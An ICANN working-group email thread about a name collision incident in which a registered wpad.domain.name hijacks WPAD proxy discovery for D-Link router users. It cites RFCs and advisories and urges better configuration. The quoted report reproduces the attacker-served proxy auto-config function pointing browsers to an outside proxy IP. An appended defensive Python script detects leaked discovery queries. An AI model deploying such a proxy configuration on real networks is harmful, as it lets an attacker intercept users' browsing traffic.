<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns="http://www.w3.org/TR/REC-html40">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=us-ascii">
<meta name="Generator" content="Microsoft Word 15 (filtered medium)">
<style><!--
/* Font Definitions */
@font-face
        {font-family:"Cambria Math";
        panose-1:2 4 5 3 5 4 6 3 2 4;}
@font-face
        {font-family:Calibri;
        panose-1:2 15 5 2 2 2 4 3 2 4;}
@font-face
        {font-family:Menlo;
        panose-1:0 0 0 0 0 0 0 0 0 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
        {margin:0in;
        margin-bottom:.0001pt;
        font-size:11.0pt;
        font-family:"Calibri",sans-serif;}
a:link, span.MsoHyperlink
        {mso-style-priority:99;
        color:blue;
        text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
        {mso-style-priority:99;
        color:purple;
        text-decoration:underline;}
p.msonormal0, li.msonormal0, div.msonormal0
        {mso-style-name:msonormal;
        mso-margin-top-alt:auto;
        margin-right:0in;
        mso-margin-bottom-alt:auto;
        margin-left:0in;
        font-size:11.0pt;
        font-family:"Calibri",sans-serif;}
span.apple-tab-span
        {mso-style-name:apple-tab-span;}
span.EmailStyle19
        {mso-style-type:personal-reply;
        font-family:"Calibri",sans-serif;
        color:windowtext;}
.MsoChpDefault
        {mso-style-type:export-only;
        font-size:10.0pt;}
@page WordSection1
        {size:8.5in 11.0in;
        margin:1.0in 1.0in 1.0in 1.0in;}
div.WordSection1
        {page:WordSection1;}
--></style><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1" />
</o:shapelayout></xml><![endif]-->
</head>
<body lang="EN-US" link="blue" vlink="purple">
<div class="WordSection1">
<p class="MsoNormal"><a name="_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">Rubens, thanks for bringing this up. I thought I would share some background information on this issue with
 this group.<o:p></o:p></span></a></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p>&nbsp;</o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">We have heard reports where D-Link routers append domain.name to Web Proxy Auto-Discovery
 Protocol (WPAD) resolution requests.&nbsp; RFC 1535, from 1993, effectively outlines&nbsp;<b>this</b>&nbsp;security issue and makes recommendations to mitigate it. Individual security experts from organizations such as Google and Verisign have provided commentary [slprocessing]
 on the risks and nuances caused by interactions with Domain Name System (DNS) search list processing in new and existing domain names (at any point in the label space). Additionally, the Internet Corporation for Assigned Names and Numbers (ICANN) Security
 and Stability Advisory Committee (SSAC) has warned about the risks of such DNS search list processing for years now, and has outlined the behavior in SAC064 [sac064], SSAC Advisory on DNS &#8220;Search List&#8221; Processing.&nbsp;<o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">&nbsp;<o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">In addition to the above, there is a large array of risks when networked devices use service
 discovery protocols such as WPAD, DNS Service Discovery (DNS-SD), and Intra-Site Automatic Tunnel Address Protocol (ISATAP). If these are not properly configured, they can be easily exploited.&nbsp; The security community, national CERTs [cert-wpad], ICANN, and
 Verisign [vrsn-wpad] have warned about these risks for some time now.&nbsp;With more devices connected to the internet attempting &#8220;zero configuration&#8221; solutions for ease of deployment, and more adversaries searching for easily compromised devices, it is paramount
 that developers and manufacturers heed these warnings and ship their systems with secure configurations, and that network administrators ensure proper IT hygiene with these devices.&nbsp;The Internet Society and Online Trust Alliance&#8217;s efforts [ota-trust] in this
 area are but one example of advice that network administrators and developers alike should be aware of.<o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">&nbsp;<o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">There are some triage-level benefits inherent in protections offered by delegated top level
 domains (TLDs) versus undelegated TLDs, as outlined in [apples], as well as some related benefits provided by DNS Security Extensions (DNSSEC) in delegated TLDs.&nbsp;However, the attack surface is far larger than just at an authoritative name server/registry.
 These specific attack vectors can be exploited at any point in the label space, in both delegated and undelegated TLDs, in intermediate (e.g., recursive name server, on the wire man in the middle, etc.), and authoritative levels of the DNS.&nbsp;
<o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p>&nbsp;</o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">Proper configurations [sac064] and solutions such as DNSSEC&#8217;s cryptographic protections should
 be employed to minimize the potential for these attacks to be effectively exploited by an attacker.&nbsp;It is imperative that network administrators have awareness and visibility into this problem, and that they directly address its actual causes instead of perennially
 triaging them through controls that only address symptoms of the problem (i.e., registration block lists, reserved names, etc. on authoritative name servers and/or registries are best used only as stop-gap solutions while operators, system administrators,
 and software engineers address the actual cause: end-system confusion over their use of namespaces, and improper search list configurations).&nbsp;&nbsp;
<o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">&nbsp;<o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">Verisign&#8217;s security team has expressly contacted D-Link regarding this issue but has no further
 comment on the matter.<o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">&nbsp;<o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p>&nbsp;</o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">[rfc1535]&nbsp;</span></span><span style="mso-bookmark:_MailEndCompose"></span><a href="https://www.ietf.org/rfc/rfc1535.txt"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><span style="color:windowtext">https://www.ietf.org/rfc/rfc1535.txt</span></span></span><span style="mso-bookmark:_MailEndCompose"></span></a><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">&nbsp;<o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">[slprocessing]&nbsp;</span></span><span style="mso-bookmark:_MailEndCompose"></span><a href="https://forum.icann.org/lists/comments-name-collision-05aug13/msg00060.html"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><span style="color:windowtext">https://forum.icann.org/lists/comments-name-collision-05aug13/msg00060.html</span></span></span><span style="mso-bookmark:_MailEndCompose"></span></a><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">&nbsp;<o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">[sac064]&nbsp;</span></span><span style="mso-bookmark:_MailEndCompose"></span><a href="https://www.icann.org/en/system/files/files/sac-064-en.pdf"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><span style="color:windowtext">https://www.icann.org/en/system/files/files/sac-064-en.pdf</span></span></span><span style="mso-bookmark:_MailEndCompose"></span></a><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">&nbsp;<o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">[ota-trust]&nbsp;</span></span><span style="mso-bookmark:_MailEndCompose"></span><a href="https://otalliance.org/news-events/press-releases/ota-releases-iot-trust-framework"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><span style="color:windowtext">https://otalliance.org/news-events/press-releases/ota-releases-iot-trust-framework</span></span></span><span style="mso-bookmark:_MailEndCompose"></span></a><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">&nbsp;<o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">[apples]&nbsp;</span></span><span style="mso-bookmark:_MailEndCompose"></span><a href="https://forum.icann.org/lists/comments-name-collision-05aug13/pdfwMG5QF57h3.pdf"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><span style="color:windowtext">https://forum.icann.org/lists/comments-name-collision-05aug13/pdfwMG5QF57h3.pdf</span></span></span><span style="mso-bookmark:_MailEndCompose"></span></a><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">&nbsp;<o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">[cert-wpad]&nbsp;</span></span><span style="mso-bookmark:_MailEndCompose"></span><a href="https://www.us-cert.gov/ncas/alerts/TA16-144A"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><span style="color:windowtext">https://www.us-cert.gov/ncas/alerts/TA16-144A</span></span></span><span style="mso-bookmark:_MailEndCompose"></span></a><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">&nbsp;<o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">[vrsn-wpad]&nbsp;</span></span><span style="mso-bookmark:_MailEndCompose"></span><a href="https://www.verisign.com/en_US/internet-technology-news/cert-alert/index.xhtml"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><span style="color:windowtext">https://www.verisign.com/en_US/internet-technology-news/cert-alert/index.xhtml</span></span></span><span style="mso-bookmark:_MailEndCompose"></span></a><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p>&nbsp;</o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><o:p>&nbsp;</o:p></span></p>
<span style="mso-bookmark:_MailEndCompose"></span>
<div>
<div style="border:none;border-top:solid #E1E1E1 1.0pt;padding:3.0pt 0in 0in 0in">
<p class="MsoNormal"><b>From:</b> gnso-newgtld-wg-wt4-bounces@icann.org [mailto:gnso-newgtld-wg-wt4-bounces@icann.org]
<b>On Behalf Of </b>Rubens Kuhl<br>
<b>Sent:</b> Thursday, September 28, 2017 1:42 PM<br>
<b>To:</b> gnso-newgtld-wg-wt4@icann.org<br>
<b>Subject:</b> [EXTERNAL] [Gnso-newgtld-wg-wt4] Ongoing name collision incident<o:p></o:p></p>
</div>
</div>
<p class="MsoNormal"><o:p>&nbsp;</o:p></p>
<div>
<p class="MsoNormal"><o:p>&nbsp;</o:p></p>
</div>
<div>
<p class="MsoNormal">Nothing like real-life experience to base policy discussions on: there is an ongoing name collision incident in a legacy gTLD.&nbsp;<o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><o:p>&nbsp;</o:p></p>
</div>
<div>
<p class="MsoNormal">D-Link routers have a default parameter that gives local networks the suffix domain.name; so, names without a full domain name get domain.name appended for their queries.&nbsp;<o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><o:p>&nbsp;</o:p></p>
</div>
<div>
<p class="MsoNormal">Microsoft operating systems query for the string &quot;wpad&quot; to determine local proxy servers of an organisation.&nbsp;<o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><o:p>&nbsp;</o:p></p>
</div>
<div>
<p class="MsoNormal">.name is a registry where a domain is required to be first.last.name, with two labels.&nbsp;<o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><o:p>&nbsp;</o:p></p>
</div>
<div>
<p class="MsoNormal">So... someone registered wpad.domain.name and is now taking over browsing traffic for the affected users, which can be in the order of millions but are at least in the thousands.&nbsp;<o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><o:p>&nbsp;</o:p></p>
</div>
<div>
<p class="MsoNormal">For live view of the redirection process:<o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><a href="https://gwhois.org/wpad.domain.name&#43;dns">https://gwhois.org/wpad.domain.name&#43;dns</a><o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><o:p>&nbsp;</o:p></p>
</div>
<div>
<p class="MsoNormal"><a href="http://wpad.domain.name/wpad.dat">http://wpad.domain.name/wpad.dat</a>&nbsp;will return the list of proxy servers under attacker control.&nbsp;<o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><o:p>&nbsp;</o:p></p>
</div>
<div>
<p class="MsoNormal">(It currently returns this:<o:p></o:p></p>
</div>
<div>
<div>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:&quot;Menlo&quot;,serif">function FindProxyForURL(url, host) {<o:p></o:p></span></p>
</div>
<div>
<p class="MsoNormal"><span class="apple-tab-span"><span style="font-size:8.5pt;font-family:&quot;Menlo&quot;,serif">&nbsp;&nbsp;&nbsp;&nbsp;</span></span><span style="font-size:8.5pt;font-family:&quot;Menlo&quot;,serif">return 'PROXY 185.82.212.95:8080; DIRECT';<o:p></o:p></span></p>
</div>
<div>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:&quot;Menlo&quot;,serif">}<o:p></o:p></span></p>
</div>
</div>
<div>
<p class="MsoNormal">)<o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><br>
<br>
<o:p></o:p></p>
</div>
<div>
<p class="MsoNormal">Policy question for the item &quot;name collisions in legacy gTLDs&quot; is whether contracted parties should be obliged to act in a certain way under similar circumstances.&nbsp;<o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><o:p>&nbsp;</o:p></p>
</div>
<div>
<p class="MsoNormal"><o:p>&nbsp;</o:p></p>
</div>
<div>
<p class="MsoNormal">Rubens<o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><o:p>&nbsp;</o:p></p>
</div>
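<p class="MsoNormal">The search list behaviour described in this thread, as an added example that is not part of either message: it shows how a suffix such as domain.name turns the short name "wpad" into a public query, and scans resolver logs for discovery names leaving zones the operator controls. CONTROLLED_ZONES, the log line format, the sample lines and the resolv.conf-style ordering rule are assumptions made for illustration; other stub resolvers order their attempts differently.</p>
<pre>
```python
# Added example: DNS search-list expansion of short discovery names, and a
# log check for such queries leaving zones the operator controls.
# CONTROLLED_ZONES and SAMPLE_LOG are constructed, not taken from the thread.

CONTROLLED_ZONES = ("corp.example",)      # assumption: zones the operator runs
DISCOVERY_LABELS = ("wpad", "isatap")     # short names used by WPAD and ISATAP

SAMPLE_LOG = [                            # constructed "client qname qtype" lines
    "192.0.2.10 wpad.domain.name. A",
    "192.0.2.11 wpad.corp.example. A",
    "192.0.2.12 www.domain.name. A",
    "192.0.2.13 WPAD.Domain.Name AAAA",
]


def normalize(name):
    """Lower-case a DNS name and drop the trailing root dot."""
    return name.strip().lower().rstrip(".")


def expand_search_list(name, search_list, ndots=1):
    """Return the names a resolv.conf-style stub resolver tries, in order."""
    if name.endswith("."):                # already fully qualified: no suffixes
        return [normalize(name)]
    bare = normalize(name)
    suffixed = [bare + "." + normalize(s) for s in search_list]
    if bare.count(".") >= ndots:          # enough dots: try the name as-is first
        return [bare] + suffixed
    return suffixed + [bare]              # short name: suffixes are tried first


def under_controlled_zone(fqdn, zones=CONTROLLED_ZONES):
    """True if fqdn equals, or is a subdomain of, a zone the operator controls."""
    fqdn = normalize(fqdn)
    for zone in zones:
        zone = normalize(zone)
        if fqdn == zone or fqdn.endswith("." + zone):
            return True
    return False


def leaked_discovery_queries(log_lines, zones=CONTROLLED_ZONES):
    """Return (client, qname) pairs for discovery names asked outside our zones."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) != 3:
            continue                      # skip malformed lines
        client, qname, _qtype = parts
        qname = normalize(qname)
        first_label = qname.split(".")[0]
        if first_label in DISCOVERY_LABELS and not under_controlled_zone(qname, zones):
            hits.append((client, qname))
    return hits


if __name__ == "__main__":
    print(expand_search_list("wpad", ["domain.name"]))
    for client, qname in leaked_discovery_queries(SAMPLE_LOG):
        print("leak:", client, qname)
```
</pre>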
</div>
</body>
</html>